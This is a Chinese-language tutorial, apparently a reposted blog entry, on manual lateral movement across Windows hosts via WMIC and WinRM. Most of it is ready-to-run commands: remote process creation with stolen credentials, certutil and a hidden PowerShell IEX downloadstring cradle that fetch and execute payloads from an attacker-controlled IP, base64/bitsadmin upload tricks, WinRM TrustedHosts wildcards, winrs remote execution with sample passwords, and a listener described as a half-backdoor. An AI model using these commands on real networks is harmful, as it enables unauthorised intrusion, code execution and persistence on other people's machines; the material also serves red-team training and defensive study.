其他分享
首页 > 其他分享> > 20.横向渗透——利用WMIC、winRM手工横向

20.横向渗透——利用WMIC、winRM手工横向

作者:互联网

一、利用WMIC(当目标机器只开启135端口):

 

 

    windows除了cmd ,powershell以外另一个更为强大的命令执行shell——WMIC,WMIC其实就是WMI的管理工具。WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本地和远程计算机。

 

  Shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create “<后门文件或者命令>”

 

 

  由于只开启了135端口,所以这里无法通过ls查看的具体情况的(445没开),但我们上帝视角切到靶机发现确实是执行命令了的

 

 

  同时又因为没开445端口,这时候我们就需要特殊的方法上传文件让它上线了。

 

1、certutil上线

 

①先创建一个提供下载的地址

 

 

 

②让目标机器去我们上一步创建的链接下载文件:

shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create "certutil -urlcache -split -f http://192.168.1.50:80/a c:\certutil.exe"

 

③执行所下载的文件:

shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create "cmd.exe /c c:\certutil.exe"

 

 

 

 

2、其他方法:

 

①利用powershell一步到位:

  Shell wmic /node:<目标IP> /user:<目标用户> /password:<目标密码> process call create “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘192.168.1.3:8080/a/b’))\””

 

②通过bitsadmin

 

③通过共享文件上传

    万一对方也开了445端口,那就把文件放到共享文件夹。通过net use再copy过去执行 。

 

③echo

    这是没有办法的办法了,把二进制转换为base64然后echo进目标机器,然后再解码运行。

 

 

二、利用WinRM(目标机器开启5985端口):

 

 

WinRM(Windows Remote Management)是Windows对WS-Management的实现,WinRM允许远程用户使用工具和脚本对Windows服务器进行管理并获取数据。

Web服务管理协议(WS-Management,Web Services-Management)是一种基于SOAP协议的DMTF开放标准,用于对服务器等网络设备以及各种Web应用程序进行管理。

如果拿到一台机器,经过凭证等信息收集后,但是再次探测发现目标机器已经不开3389,只开了5985端口时,就可以用WinRM了

 

1、初始化服务:

由于初始化需要交互界面,所以建议开了代理之后再操作。

此外,网络连接类型不能是公用网络类型,可以是家庭或者工作。

 

再目标机器上初始化:

winrm qc

or

winrm quickconfig -q

 

2、设置信任主机:

    接下来就是在攻击机上操作了,要确保发起连接的主机与目标主机处于同一域或者两台主机的WinRM服务TrustedHosts中必须存在对方主机的IP或主机名

 

winrm set winrm/config/Client @{TrustedHosts="*"}

winrm set winrm/config/Client @{TrustedHosts="*.baidu.com"}

winrm set winrm/config/Client @{TrustedHosts="*.baidu.com,192.168.1.4"}

 

winrm get winrm/config/client|findstr TrustedHosts

 

3、执行命令:

 

winrs -r:http://192.168.2.10:5985 -u:administrator -p:admin whoami

winrs -r:http://192.168.2.11:5985 -u:allen -p:132414 whoami

winrs -r:http://192.168.2.40:5985 -u:administrator -p:132414abc! whoami

 

 

4、注意:

    Win7-10都可以使用,rid非500也可以,不需要添加注册表。但是不能是公用网络,同时需要互为信任的主机(在第2步设置)

 

5、半个后门:

    对于目标机器是Windows Server 2012以上的服务器操作系统中,WinRM服务默认启动并监听了5985端口。通过下面的命令,可以新增WinRM一个80端口的监听(注意这条命令是事先在目标机器上敲的):

 

winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}

 

 

标签:20,Windows,winrm,winRM,横向,192.168,5985,端口,WinRM
来源: https://www.cnblogs.com/Thorndike/p/15834968.html